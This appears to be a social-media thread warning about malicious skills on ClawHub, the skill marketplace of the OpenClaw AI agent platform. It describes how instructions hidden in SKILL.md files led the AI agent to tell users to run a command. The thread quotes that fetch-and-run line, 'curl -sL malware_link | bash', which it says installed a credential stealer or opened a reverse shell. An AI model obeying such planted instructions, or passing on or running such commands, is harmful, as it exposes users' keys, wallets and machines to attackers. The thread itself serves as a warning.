the #1 most downloaded skill on OpenClaw marketplace was MALWARE

it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server

1,184 malicious skills found, one attacker uploaded 677 packages ALONE

OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins

you install a skill, your AI agent gets new powers, this sounds great

the problem? ClawHub let ANYONE publish with just a 1 week old github account

attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL

but hidden in the SKILL .md
file were instructions that tricked the AI into telling you to run a command

> to enable this feature please run: curl -sL malware_link | bash

that one command installed Atomic Stealer on macOS

it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files

on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine.